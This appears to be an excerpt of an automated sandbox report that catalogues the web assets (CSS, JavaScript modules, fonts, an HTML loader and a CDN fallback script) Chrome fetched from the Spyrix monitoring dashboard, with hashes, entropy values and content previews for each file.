                                                                                                                                                                                                                                                          Preview:.-ztRySNh{display:flex;position:relative;flex-direction:column;height:fit-content}.Ftt0CpWQ{width:200px}._4aI8AqCH{opacity:.5;pointer-events:none}.WnNoxKKH{width:100%;font-size:15px;padding:10px 13px;border-radius:10px;border:1px solid var(--input-border);background-color:var(--input-bg);color:var(--app-text);outline:none;transition:.3s;overflow:hidden}@media screen and (max-width: 480px){.WnNoxKKH{font-size:16px}}.a6kY8aNX{border:1px solid var(--card-border);color:var(--app-text);background-color:#fff;transition:.3s;box-shadow:var(--filter-button-shadow)}._-9LXnRIR{box-shadow:var(--filter-button-shadow-active);transform:translateY(-1px)}.F8HcYjNr{padding:10px 50px 10px 10px}.WnNoxKKH:focus{border-color:var(--primary)}.StnNIJM1{border-radius:10px 10px 0 0}.EKAf0gVE{border-color:var(--danger);animation:vzGZS5BU;animation-duration:.8s}.EKAf0gVE:focus{border-color:var(--danger)}.YJawxt4q{border-color:var(--success);animation:J-FFIdf3;animation-duration:.8s}.YJawxt4q:focus{border-color:var
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):193
                                                                                                                                                                                                                                                          Entropy (8bit):4.890925322111789
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:GCS9iDe6W4Z2S0N4mSR5C0AOoWRIJ6Ge/nHFHC0AOoWRIJ6Ge/lwIQMefnv:GCS9iPh2fq9S2Ge/H1S2Ge9hwv
                                                                                                                                                                                                                                                          MD5:C0140EE8C87F9E754F26661D59A188EB
                                                                                                                                                                                                                                                          SHA1:86540FD8F4BCEC9CD775079D1F9E552339DBBB1F
                                                                                                                                                                                                                                                          SHA-256:EAD06CA10694C82218CC5B89E938B31B6CD7C8F2C459DFA53DED7CD994DD8295
                                                                                                                                                                                                                                                          SHA-512:30C29229706C5A1F62C29EA64250C763E62946D81F56E510503B4E8D2E51FE4AA0833297D6AE38F718DD0929EAE9CC26320FD0A8B5F0E2AEB92498F6CB581F51
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/ButtonText-ead06ca1.css
                                                                                                                                                                                                                                                          Preview:.vaJg7XGf{display:inline;min-width:0;width:100%;flex:1;text-align:center;justify-content:center}.mtxFuuqo{color:inherit;text-align:center;justify-content:center}.MtAUm4rd{color:var(--primary)}.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, Unicode text, UTF-8 text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):987
                                                                                                                                                                                                                                                          Entropy (8bit):5.179649768973068
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:m2kqUquqB3Wbp0V+uzU+xWkjPE/mB/sXZsB:m8UqiDMWh2sXZc
                                                                                                                                                                                                                                                          MD5:27EC29286E721D5B6E14B6D719F1E743
                                                                                                                                                                                                                                                          SHA1:5B1952EB5702AE263C64ECAD8816CE0E723B2D50
                                                                                                                                                                                                                                                          SHA-256:DFD3C3DFEFCEA9215799DAD6F6E71074FA7E4660EAD660B85F4E6EE243EA55DD
                                                                                                                                                                                                                                                          SHA-512:82F80ADA35372D6F0174F177E0A87843D6E7A2B1442AF44F908E75CA91A52C4E1B2D55EAFB08494C025996076148247A7A1DFC8BE2D249D0B1566209F68B050B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://dashboard.spyrix.com/cdn.js
                                                                                                                                                                                                                                                          Preview:.class Cdn {. _maxCounter = 30;. _interval = null;. _counter = 0;.. init() {. // document.cookie = 'cdn-off=0'; //...... ... .... ............ . .. .......... .. ....... this._interval = setInterval(this._checkDom.bind(this), 1000);. }.. _checkDom() {. this._counter += 1;.. const element = document.querySelector('.progress-loader');.. if (!!element && !!this._interval) {. clearInterval(this._interval);. }.. if (this._counter >= this._maxCounter && !!this._interval) {. clearInterval(this._interval);.. if (!element) {. this._disableCDN();. }. }. }.. _disableCDN() {. document.cookie = 'cdn-off=30';. location.reload();. }.. _enableCDN() {. document.cookie = 'cdn-off=0';. }.}..const cdn = new Cdn();.cdn.init();..// ..... ......... .... ...... .... ........// window.addEventListener('unload', () => {.// cdn._enableCDN();.// });
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):271541
                                                                                                                                                                                                                                                          Entropy (8bit):5.571845748728196
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:2k3n+yZmgryzjrgBB9Tch2+4jm8eTVcwOuw4z:tuumgrtkOI
                                                                                                                                                                                                                                                          MD5:B56A3E51745FDDE2369A06B3B5F3457A
                                                                                                                                                                                                                                                          SHA1:E417E835A7F0CD2EACC6C7C7AE856084BE31F3A7
                                                                                                                                                                                                                                                          SHA-256:E939531465B3F2F5295B23F61B7BA9BF3A1E9F2642017901A398D322B5B524C8
                                                                                                                                                                                                                                                          SHA-512:2F5BE9B302E0C6289F8CA894FEF27A7847C69FECC35DF8EE7E821E62392B896825460765F8F8E3339F3BC28A9986EDA81FE4FF038FEEE3B4774690954B96AA66
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":11},{"function":"__ogt_ip_mark","priority":6,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":13},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","spyrix\\.com"],"tag_id":14},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":15},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"",
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 61324
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):14777
                                                                                                                                                                                                                                                          Entropy (8bit):7.985311124175744
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:wRjB6v/xeGOgP84779+VKmX1nGMJpjHyC:wRlexAOxmX1nGMDHyC
                                                                                                                                                                                                                                                          MD5:12D71E76550BE9BFDFDAB148795FFFD0
                                                                                                                                                                                                                                                          SHA1:0E49EEE8873E6CD22A04557B47A272E424379186
                                                                                                                                                                                                                                                          SHA-256:35DC7260DC2119B3DE608859D5DC0179652C72FB426DE265FF178A19DBD65297
                                                                                                                                                                                                                                                          SHA-512:E8D46F38B669136DC1E233379500CF079DFCA8EA6D09F46F6B3C841E7539AB5F55080507A27C05FA182E1332CC2F3A98F4A1BAB4DF8417FE129B535013DB736A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css
                                                                                                                                                                                                                                                          Preview:...........}{s#.....).....b..R...Y.o..{o.S..."-..TK=:.g._&2.(.H...w.q..T.J$.D..E..w........6.|q...vs..yQ..O.....o.7...z.+f.....px.../.M.....f.....:./..r..we..>......:.Cu...w._.y>...E...E....w...f....g.............<..ju.<...Nk..g...u5.P.yR......l..?..#)..v]f..p.X,.. ..8F..h3=.6...U.....a.{y..W..v3.U....P]o?T..z.4[...\....v.}.Y.]ow.w....x.@.....I....j.....Y.8T^..|.]?.....a.^W....iU...n....;.|..=......EFo.}.V..m5[.6.$.v...js..v...jw;./z....\...}y.._.z.....u..`&....m....f...U.......".H...pU.I.....E.u.....'m..]Y.2...~6.....a.^......K....=<.?.D.L)}.H.6..qK.d.YV.....rX.&d.zu...C`..Y..........%.{9l_R.dN...../5......vw.7.+.Y.)....vS]g..L?..*..a.X,..`....2zJ].....:{.,a...X.>B$.a.$u]h.{....+..{t.=U..!.t......|{8l..YU!o...o..(5.b..a..3.C.=...+.l.|....A.s...|..$..$)..g..=.h:\l..}.q...K.}..!..)....}.....k..A...~L>}.1JQ...g..b.*.j....KD.wU.. j...;,.....u...Y....3U..=.R..l.....*T..Q*BGt........... ..O._...6..Q.#.3.....'...EO.....1..,.pD...p.p.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 44112, version 1.0
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):44112
                                                                                                                                                                                                                                                          Entropy (8bit):7.9948954741957445
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:768:qGOGI3UCq6sLa8v1/S4xmK/+/PyZV36e2TQxLWV0Bu+ApsjGflc/PMMY:qGO3q6ga8v15xmK/SP+3lJWqB+psKNKK
                                                                                                                                                                                                                                                          MD5:1C42A31D86C3E555177BCEBFDF350242
                                                                                                                                                                                                                                                          SHA1:036274A3A1786AE81BFAFECE5F49927103244AC2
                                                                                                                                                                                                                                                          SHA-256:73DCAA510E814FF8CF4672A984FA934A4385253A50507E2390A5150A40A5971C
                                                                                                                                                                                                                                                          SHA-512:7091CEB7B24B4F84D54958BB7C3E10AA0E34E73465977C4CE09D08F75DCDA3BE2989CDB95EF38282E4A62863B3DA1B4B8CEC0E316508A68551C80952DBABE171
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2
                                                                                                                                                                                                                                                          Preview:wOF2.......P......................................2...r....`?STATH..*.....4..A.....6.$..8. ..^..5..[.....C5....t..d_.:.......n...u=iX.7Fn..(..........$....3.....)..2..0.....#e2`4....L.....d8.y....\....D.....0X..~f.-...|.`...2.i.~L.N..".....Gwc%`&Oa.:..>.@z.........^...s..y..f^N6.......+NN.....N#.c....;"j..A]....."}.?h.b...*R=r...p..X.{."A...8.9....T.....`I..P..%...,k...L..MO.wf.%....{....S....F....wbh...U9SeE...QY.&!*....v=#s.~.......v$.N...1..+|k.......D.....R.k._dU......#..lO.S...*`...x~.w....o.i..v.....nC.."+...c?.3w...i...84:.RI...B#t......Z..b.....E.7.....G.....AT..X`......9c.9.g....:@s....cT..F..........c.01.h...Gb..?...&Z.'y.{.4....J.BV.....~o...". ...?..![...d....^+.......o.B.#J0.<.h.g..4...M6R.......Tb......%..x4J4...6...9.H...'b:b.....~..._.{..)]J:....t.l.m......n..,..z....W..... U.....R.W..y8...A..T...TT.>....|.ql.u2.../1.=".D.....u.Z].p)..%.0..`..X...........".............n..T .>..'s\.c,..\...W..yx.......QR..M..lB...o....%.m.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):129
                                                                                                                                                                                                                                                          Entropy (8bit):4.715705921334956
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:lH4Vg0CwERKAAIx/fQxAUEm5JZHJPpRKrUrKzAdgbDn:l30Cw4MYoxJfHhpAArKzAaX
                                                                                                                                                                                                                                                          MD5:738B618755592A2FB11C090833DAA6FF
                                                                                                                                                                                                                                                          SHA1:985ED99CF7A1BED24569735A33B757531D027AE3
                                                                                                                                                                                                                                                          SHA-256:BA59C56764D29D3B0C21BFB12D2F7AE92E745420F214B3B3DC52D31712301E39
                                                                                                                                                                                                                                                          SHA-512:5CADFC6D7594CFD29CCF8539F35FDFC6B5B39525235DD38F1CBE0A49D0FB67D417AFBA1C2B0ACCEBE7C6F06C5FC9951CC167BB37F25F05D9F8E3313E5C27D42C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js
                                                                                                                                                                                                                                                          Preview:const t="_6ptc-v1o",o="eTUt1vSM",c={"button-template":"_6ptc-v1o",buttonTemplate:t,"with-icon":"eTUt1vSM",withIcon:o};export{c};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7285
                                                                                                                                                                                                                                                          Entropy (8bit):7.964038684015041
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:TvxMGwo9hFNrNNXizl2Bcj94aps9y5aW2CHkz92mDXnjrVo75OKc:7aboh57AL94ly592CmFXidJc
                                                                                                                                                                                                                                                          MD5:F687E94F4D455BA119D2187B14A884AE
                                                                                                                                                                                                                                                          SHA1:5206BDA3E1959F6A7369D33171F9AF76F92C21E2
                                                                                                                                                                                                                                                          SHA-256:5D18275C9AC22E917CEA324C250F54D9F6A1899BAB0EFBDF3739A6AB181BE5A3
                                                                                                                                                                                                                                                          SHA-512:1EA801D2E9BD5C4A3FAD19776270D971A159B28B52AF0369D208D6FFC0A5F81BF0CD8B8CA2379B1C75E366694DBE4B1ED1C7CBB78137F61829A8AC38B54D93CA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............n.V...Sp..v.ka....!..$.;..%.....*..6...,.J....'....{I.".K.v:."......fM..Iq..\....S...O..k......../....}...|......O]}.>.O.6u.a...GK..UE.3..usF..az.m...0.]...&o.[../..Y.L...i...0..U...0....M[.RwBy...8...Orq.>+..H..o:....o.f}t.>lRw...).O....J.3?o*.f..jrfu.0mX.K:m....U_..zN.M.([f.#{PWeM.w.\,...V..^...m.q..6u..../O..w..Y.*..{x.~QVV..w}.}x5|..q........v..a...J...H...I...~..o..5....._.......G.'.{.=k.F......>...|..}..T....6....e..TX..K......,g[.S.r..l..|."..O...-...G...i....`.XhN.....sIb..u...2k..K.i.WW....T.u.7,`.w..R.g.H.\Y.i.G....f.Z...mE...\.}...C>..ZgW.,..E....:gSR...N...*.,.8.).YV...nU..l;.M."18(...y...d..n.lV..[n.:............p.E[$..:..u.(.y..6.K.ErvR... Yy.....v..f.%..m%I.,....~..]z..W.l.$.E.Y3.L..@.J.:O.4....'S5..Kj....@W..,...N^..}.n....DLz..l....v...J3JJ..o.Q...^R8mY....&..[..<s..7a.Y.<c.r7.xV.N/.WE2...Vo$ci..Z..!../.b_.&.-N.en..7.|s...#.<.3.\....?.nY..;OVy.gxa....6....zy.t.j..;..V.K.?....m..o...X6.CI
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (628)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):629
                                                                                                                                                                                                                                                          Entropy (8bit):5.408519312247252
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:M5WsR75UQOHXu8jeAYJMngYRde4HL1DBVTUojE0uymy:M5/p99JMngYZHZDBbfuymy
                                                                                                                                                                                                                                                          MD5:7CB321EE79F0127E78FAD017F97285AA
                                                                                                                                                                                                                                                          SHA1:5921A3AFA7B59C1A69F214A592F5290A9AA5A080
                                                                                                                                                                                                                                                          SHA-256:2BF0E6089F8E9819E3CAA315D3C024148EE6D53411450118363668A0B9F2F6D5
                                                                                                                                                                                                                                                          SHA-512:E1994D07BDF15F40ACB2E1F35A3738BF24A909C6FEF2D0513D2FBBD0A0DC9A434C96AE9699C8497E0EECBD1229CC066B11A5B6413F8DF608B222FE07A61D6BC9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Button.module-6d4e91b8.js
                                                                                                                                                                                                                                                          Preview:const e="g1jDENuQ",o="kn3-jpa8",d="pi1aSgqN",r="Yx2mIjN5",n="GQTXnPVh",s="Spt6Oo9A",c="RmDlDtP1",t="nLIGWB2k",l="IePxoOqS",i="AUmvNTz6",a="_6vXQpmQD",m="q3V02Fh6",b="SJ0GPc8e",y="_5VeaxEd9",p="cKfyhJq-",h="Gw-l67yM",u="XjJMOjKF",x="WZhZ-ZKL",P="eIH6eshW",D={button:e,loading:o,disabled:d,"bordered-primary":"Yx2mIjN5",borderedPrimary:r,"bordered-filled":"GQTXnPVh",borderedFilled:n,"primary-filled":"Spt6Oo9A",primaryFilled:s,"bordered-secondary":"RmDlDtP1",borderedSecondary:c,default:"JCiXG-DG",success:t,clear:l,xs:i,sm:a,tn:m,md:b,lg:y,xl:p,inline:h,circle:u,shadow:x,"more-rounded":"eIH6eshW",moreRounded:P};export{D as c};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1097)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1098
                                                                                                                                                                                                                                                          Entropy (8bit):4.801883004252557
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pIDlt6Rqz5Rqz9cujSPhQsF+a2cG2DB/pzOpzDErt7:d0EY/BOBDG
                                                                                                                                                                                                                                                          MD5:01CEB283B00E59B25F2283787D5FBCFC
                                                                                                                                                                                                                                                          SHA1:12503D8DC4A1904F39A2BE105CD2BEF151464B80
                                                                                                                                                                                                                                                          SHA-256:EFAC77214359588EE656CE42F52A545423480B5C194894B4B3237DFA27C0BF4B
                                                                                                                                                                                                                                                          SHA-512:533636F230CE0236E8E248CB0A26593DEBBD6B88DB6E054822E831203EE15EDE59A00D01FCE8FE422535E826F6F4B865599FCB9E7FF6EF0593B0B2E736B0B273
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/en-5393c481.js
                                                                                                                                                                                                                                                          Preview:const o="convenient",e="Main",n={"The license period has expired":"The license period has expired","The trial period is expired":"The trial period is expired","Your data is safe":"Your data is safe","Please purchase a license to access your data":"Please purchase a license to access your data","Buy 1 PC for 12 months for $":"Buy 1 PC for 12 months for $","DISCOUNT {0}":"DISCOUNT {0}","Computers count":"Computers count","101 and more - ":"101 and more - ","21-100 PC - ":"21-100 PC - ","1PC per month":"1PC per month",convenient:o,"3 Months":"3 Months","6 Months":"6 Months","12 Months":"12 Months","24 Months":"24 Months","1PC for 12 Months":"1PC for 12 Months","1PC for 12 Months +":"1PC for 12 Months +","Do you have a discount coupon?":"Do you have a discount coupon?","Discount coupon":"Discount coupon","Coupon is applied":"Coupon is applied","Apply coupon":"Apply coupon","Includes Screen recording, Webcam recording, Face recognition, Call recording":"Includes Screen recording, Webcam rec
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):638
                                                                                                                                                                                                                                                          Entropy (8bit):4.939194107933857
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:hYKC/JI56MIY5Jo4PFcJt1lFqGBfqsz6/mvVg6D6TYBYAlbBmdDuzRw/vGb:hY//J46Yo8stEoz+sVg6DSYnlp92vM
                                                                                                                                                                                                                                                          MD5:1B3C31F1365D50685671B178B782862B
                                                                                                                                                                                                                                                          SHA1:7C735B95DB567AFD726F37B4EBD3420A903A7B90
                                                                                                                                                                                                                                                          SHA-256:81873B843E34209B269790E83D4AD3A229369F69B419AB61D25759763BEAABA6
                                                                                                                                                                                                                                                          SHA-512:42D2654F6E834D0E8D54036A5B3595167685908CC63B34FBE95435FE0547664C6C4AD44D82F62EBBEE95C9171EA7756E96AC2A09B3734B0BE6764F45642D53F6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">..<head>. <meta charset="UTF-8" />. <link. rel="icon". href="/favicon.ico". />. <meta. name="viewport". content="width=device-width, initial-scale=1.0". />. <meta. name="robots". content="noindex". />. <title>Dashboard</title>. <script type="module" crossorigin src="https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js"></script>. <link rel="stylesheet" href="https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css">.</head>..<body>. <div id="app"></div>. <script>. document.write('<script src="/cdn.js"><\/script>');. </script>. .</body>..</html>
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, Unicode text, UTF-8 text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):987
                                                                                                                                                                                                                                                          Entropy (8bit):5.179649768973068
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:m2kqUquqB3Wbp0V+uzU+xWkjPE/mB/sXZsB:m8UqiDMWh2sXZc
                                                                                                                                                                                                                                                          MD5:27EC29286E721D5B6E14B6D719F1E743
                                                                                                                                                                                                                                                          SHA1:5B1952EB5702AE263C64ECAD8816CE0E723B2D50
                                                                                                                                                                                                                                                          SHA-256:DFD3C3DFEFCEA9215799DAD6F6E71074FA7E4660EAD660B85F4E6EE243EA55DD
                                                                                                                                                                                                                                                          SHA-512:82F80ADA35372D6F0174F177E0A87843D6E7A2B1442AF44F908E75CA91A52C4E1B2D55EAFB08494C025996076148247A7A1DFC8BE2D249D0B1566209F68B050B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.class Cdn {. _maxCounter = 30;. _interval = null;. _counter = 0;.. init() {. // document.cookie = 'cdn-off=0'; //...... ... .... ............ . .. .......... .. ....... this._interval = setInterval(this._checkDom.bind(this), 1000);. }.. _checkDom() {. this._counter += 1;.. const element = document.querySelector('.progress-loader');.. if (!!element && !!this._interval) {. clearInterval(this._interval);. }.. if (this._counter >= this._maxCounter && !!this._interval) {. clearInterval(this._interval);.. if (!element) {. this._disableCDN();. }. }. }.. _disableCDN() {. document.cookie = 'cdn-off=30';. location.reload();. }.. _enableCDN() {. document.cookie = 'cdn-off=0';. }.}..const cdn = new Cdn();.cdn.init();..// ..... ......... .... ...... .... ........// window.addEventListener('unload', () => {.// cdn._enableCDN();.// });
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2720)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):2721
                                                                                                                                                                                                                                                          Entropy (8bit):5.2947178448950725
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:qtlh2sBoHzp5G7bGdM/mEAs882htu735/oj0I9pbXPDU8E:qt6PG7b4M/xAJ8ayApbrUn
                                                                                                                                                                                                                                                          MD5:817F0F4CD1E827C030E17392C76A17B9
                                                                                                                                                                                                                                                          SHA1:278B4C780B9111A0211C26E6A8499D6795DD03A1
                                                                                                                                                                                                                                                          SHA-256:86D79A8A639BC01A5E86E96F4010D7DA2375DCD8CEAD0C3F7FB8E8DC887EE97A
                                                                                                                                                                                                                                                          SHA-512:6523FF0171037537B247F98D12736724B87DD9185618356AD01285E0764B517B89B1F99C2A194DB8319DDD0B999372FFD5984E119CBEFC01399FAA01FDF114A3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/ConfirmPhoneModal-86d79a8a.css
                                                                                                                                                                                                                                                          Preview:.FRQJSw27{display:flex;flex-direction:column;flex:1;justify-content:center;max-width:350px;width:100%}@media screen and (max-width: 480px){.FRQJSw27{max-width:95%;padding:15px}}.NrHTQ2JN{border-radius:10px;padding:30px;background:#fff;box-shadow:var(--shadow)}.Ht9A72w8{display:flex;justify-content:space-between;position:relative;z-index:var(--z-main)}.Ht9A72w8:after{content:"";position:absolute;border:1px solid var(--app-text-inverse);width:calc(100% - 120px);bottom:10px;left:50%;transform:translate(-50%);z-index:30}.-IjymTpC{display:flex;flex-direction:column;align-items:center;width:100px;justify-content:center}.tw6CEYln{display:flex;text-align:center;margin-bottom:10px}.IYlM96Nq{margin-top:auto;width:21px;height:21px;border-radius:50%;background-color:transparent;z-index:var(--z-main);border:1px solid var(--app-text-inverse)}.-FtbW-m2{background-color:var(--primary);border-color:var(--primary)}.VAQD352X{border-radius:10px 0 0 10px;background-color:var(--sign-up-bg);background-image:
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):3029
                                                                                                                                                                                                                                                          Entropy (8bit):7.775466271259918
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:trqMHw1fogNoolwWy7d/fB/yKv8EwIgr4/0aMsVYU39z9p39AWToe8JhKtbmrLNV:tGAYfTlYH/Bv8dZc/04VYA9n3eWb8Ho6
                                                                                                                                                                                                                                                          MD5:175BFAD4569B48687A15D43A4E9BB617
                                                                                                                                                                                                                                                          SHA1:E28A5AC7818D8ACEDA0D2DE2C20DD922923C3BA5
                                                                                                                                                                                                                                                          SHA-256:F97E3C0058E3352D1F3789F40CB76DBF2C6C085AFA7535BD38F4970F884B2A45
                                                                                                                                                                                                                                                          SHA-512:658CC310C2A8FDBB32D48487CC7373B7D559AE55CB566C3669724F71ED9D86108F63E7A42B191A2A70CBCA47960E2591F7353261DCF5F0556AEDF1AB9F2D1501
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://dashboard.spyrix.com/favicon.ico
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............P3&.....gAMA......a.....pHYs..!7..!7.3X.z....tEXtSoftware.paint.net 4.1.6.N.....SIDATx^..q.F....C....C..NeI....@.@.`......C....n......nw.3..y_.W.jqw...1..w........uY(.e.7.......-.....2.e.<.V....GX....y...Z.pZ.2o.aQ+.Nk[..#,je.im.y.E..8.m.7.......-.....2.e.<.V....GX.........OtN....@.y...Z].O.yG...e....-.y.E..8....0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.x0...O.........?=......+..40..H..sZ..6.........0.A..9..p..|..\R.~.o...<.i]...U..d.....@nM..;...0..H;....NC.0.x..;...-.....v..P-.....2....C.0.x.R..B...[..<.2.K..6hlW-.....A;...E.....e...-..3[..<0.....W9+..a.'!m.....:[..O.L-..>13.0.8Y...0...".0.8y..-..NT...0...H-..N...0...zma.6..?..GX...Ao-..2o.aQ+.>...07-.....2...a..-.....2.1.}.k.S..#,je.cqmaz...y.E..x\.~.).....z..|..........y...Z.._..!y.."oG.9g.0e.<..=...,W..].'.Z.2o.aQ........E....GX.Z#.WedH.....-L.7....f.7.....Z.2o.aQk..S..la.bO.S..
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1391)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1392
                                                                                                                                                                                                                                                          Entropy (8bit):5.443005642997937
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B/6XhnpFffC3/V2iWX4qL2zzp0iRFjY6GoqRrMj5q3F0TapE7gJSvCGRBCtdSTii:BiXNzffkgiWXb2PDjPGXBWTmzJQ8ur/
                                                                                                                                                                                                                                                          MD5:370BC65CD3A997F3010006B7E0739D12
                                                                                                                                                                                                                                                          SHA1:5F9E96CC563F61F21B9C51EDA58739BF67B53940
